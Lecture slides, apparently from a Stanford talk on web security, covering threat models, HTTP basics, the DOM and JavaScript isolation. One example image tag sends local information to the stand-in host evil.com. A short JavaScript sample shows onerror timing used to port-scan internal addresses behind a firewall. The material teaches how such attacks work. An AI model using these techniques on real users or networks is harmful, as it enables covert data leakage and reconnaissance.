9/7/2013 Some topics I’m working on • Computing on encrypted data • Information flow: Dynamic IFC in Haskell, web Sandboxing Untrusted JavaScript • Third ‐ party web tracking and other web security stories • Practical web security (tools, methods,…) • Android malware scanning John Mitchell • Machine learning for CAPTCHAs, security Stanford University • Online learning Seek postdoc with theoretical, practical skills Outline for Today, Tomorrow • Background: computer security • Web fundamentals and browser security • JavaScript isolation – How can trusted and untrusted code be executed in the same Computer Security environment, without compromising functionality or security? • Three parts – Isolate untrusted application from hosting page – Isolate one untrusted application from another – Mediated access: reference monitor for critical resources • Additional topics – Operational semantics (covered between parts I and II) – Foundations for Web security Network security Computer Security • Security model – A system of interest – Desired properties of the system – Interface and capabilities of an attacker • Security analysis Alice – Can system design and security mechanism it includes guarantee desired the properties, in spite of attacker? Network Attacker Secure(Sys,Prop,Threat) = System May intercept and U UserIn. A Threat. Runs Sys(A,U). Prop(Runs) alter network traffic; cannot break crypto Inherently analytical problem; not determined by testing 1
9/7/2013 Operating system security Web Security Good server Enter password? System Browser Network User Alice OS Attacker Bad Server May control malicious How can honest users safely interact with files and applications well ‐ intentioned sites, while still freely Can also operate as client browsing the web (search, shopping, ads) ? to other servers Broader goals of web security Web Security System Good server • Safely browse the web Enter password? Browser – Users should be able to visit a variety of web sites, without incurring harm: Network • No stolen information (without user’s permission) • Site A cannot compromise session at Site B User • Secure web applications – Applications delivered over the web should have the same security properties we require for stand ‐ alone Interface Bad Server applications • Mobile apps How can honest users safely interact with – Many mobile apps are interfaces to web sites (WebView) well ‐ intentioned sites, while still freely Can also operate as client browsing the web (search, shopping, ads) ? to other servers Attacker Web Threat Models Specific problem for this talk Good server Enter password? • Web attacker Browser – Control attacker.com Network – Can obtain SSL/TLS certificate for attacker.com – User visits attacker.com User • Or: runs attacker’s Facebook app • Network attacker – Passive: Wireless eavesdropper Bad Server How can sites that incorporate untrusted – Active: Evil router, DNS poisoning JavaScript applications protect their users? • Malware attacker Supply web application – Attacker escapes browser isolation mechanisms written in JavaScript and run separately under control of OS 2
9/7/2013 Specific problem for this talk System Good server Enter password? Browser Web fundamentals and Network browser security User Interface Bad Server How can sites that incorporate untrusted JavaScript applications protect their users? Supply web application written in JavaScript Attacker Network Network request and response Uniform Resource Locator (URL) HTTP Request Method File HTTP version Headers • Global identifier of network ‐ retrievable content GET /index.html HTTP/1.1 • Example: Accept: image/gif, image/x-bitmap, image/jpeg, */* http://stanford.edu:81/class?name= cs155# homework Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Protocol Host: www.example.com Fragment Referer: http://www.google.com?q=dingbats Hostname Port Path Query Blank line • Special characters are encoded as hex: Data – none for GET – %0A = newline – %20 or + = space, %2B = + (special exception) GET : no side effect POST : possible side effect 3
9/7/2013 HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Rendering Content Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set-Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies <head> Displaying a page <title>Washington Post: Breaking News, World, US, DC News .. Analysis</title> ... </head> <body class="eidos homepage sectionfront"> <script type="text/javascript"> if(self!==top&&!(top.window.location.pathname).startsWith('/PortalEdito r')){top.location=self.location;} </script> ... <h2 class="headline"><a href="/world/national-security/nsa-gathered- thousands-of-americans-e-mails-before-court-struck-down- program/2013/08/21/146ba4b6-0a90-11e3-b87c-476db8ac34cd_story.html"> Secret court: <br>NSA gathered thousands of domestic e-mails</a> ... <p class="byline">Ellen Nakashima …</p> <p class=""> The program unlawfully gathered as many as tens of thousands of e-mails, according to a 2011 opinion.</p> ... <div class="hide"><img class="" src="http://ad.doubleclick.net/ad/N4359.washingtonpost.com/B7241351.19;sz=1x1 ;ord=[timestamp]?" width="1" height="1" border="0" style="display: inline- block; "></div> ... Share this video: ... <a class="facebook_static" onclick="TWP.Module.SocialButtons.staticSocialPopup('http://www.facebook.com/ sharer.php?u=http://www.washingtonpost.com/posttv/video/thefold/tonight-on- the-fold-august-21-2013/2013/08/21/36ed282c-0a98-11e3-9941- 6711ed662e71_video.html%3Ffb_ref%3Dsm_btn_fb')"> ... HTML Image Tags Image tag security issues <img src=“http://example.com/sunset.gif” • Communicate with other sites height="50" width="100"> – <img src=“http://evil.com/pass ‐ local ‐ information.jpg?extra_information”> • Requests, receives, and displays a picture • Hide resulting image – <img src=“ … ” height=“1" width=“1"> – Security issues? • Spoof other sites – Add logos that fool a user Important Point: A web page can send information to any site 23 24 4
9/7/2013 Browser execution model Document Object Model (DOM) • Object ‐ oriented interface • Each browser window or frame – web page in HTML is structured data – Loads content – Renders it – DOM provides representation of this hierarchy • Processes HTML and scripts to display page • May involve images, subframes, etc. • Examples – Responds to events – Properties: document.alinkColor, document.URL, • Events can be document.forms[ ], document.links[ ], – User actions: OnClick, OnMouseover document.anchors[ ] – Rendering: OnLoad, OnBeforeUnload – Methods: document.write(document.referrer) – Timing: setTimeout(), clearTimeout() JavaScript onError Changing HTML using Script, DOM HTML • Some possibilities • Basic function <ul id="t1"> <li> Item 1 </li> – createElement(elementName) – Triggered when error occurs loading a document or an </ul> – createTextNode(text) image – appendChild(newChild) • Example – removeChild(node) <img src="image.gif" • Example: Add a new list item: onerror="alert('The image could not be loaded.')“ > var list = document.getElementById('t1') – Runs onError handler if image does not exist and cannot load var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext) http://www.w3schools.com/jsref/jsref_onError.asp Security consequence JavaScript timing Port scanning behind firewall • Sample code • JavaScript can: <html><body><img id="test" style="display: none"> – Request images from internal IP addresses <script> • Example: <img src=“192.168.0.4:8080”/> var test = document.getElementById(’test’); – Use timeout/onError to determine success/failure var start = new Date(); – Fingerprint webapps using known image names test.onerror = function() { var end = new Date(); Server 1) Request page scan alert("Total time: " + (end ‐ start)); } test.src = "http://www.example.com/page.html"; Malicious </script> 2) Send html, JavaScript Web page </body></html> scan Browser 3) port scan results scan – When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. Firewall 5
Recommend
More recommend
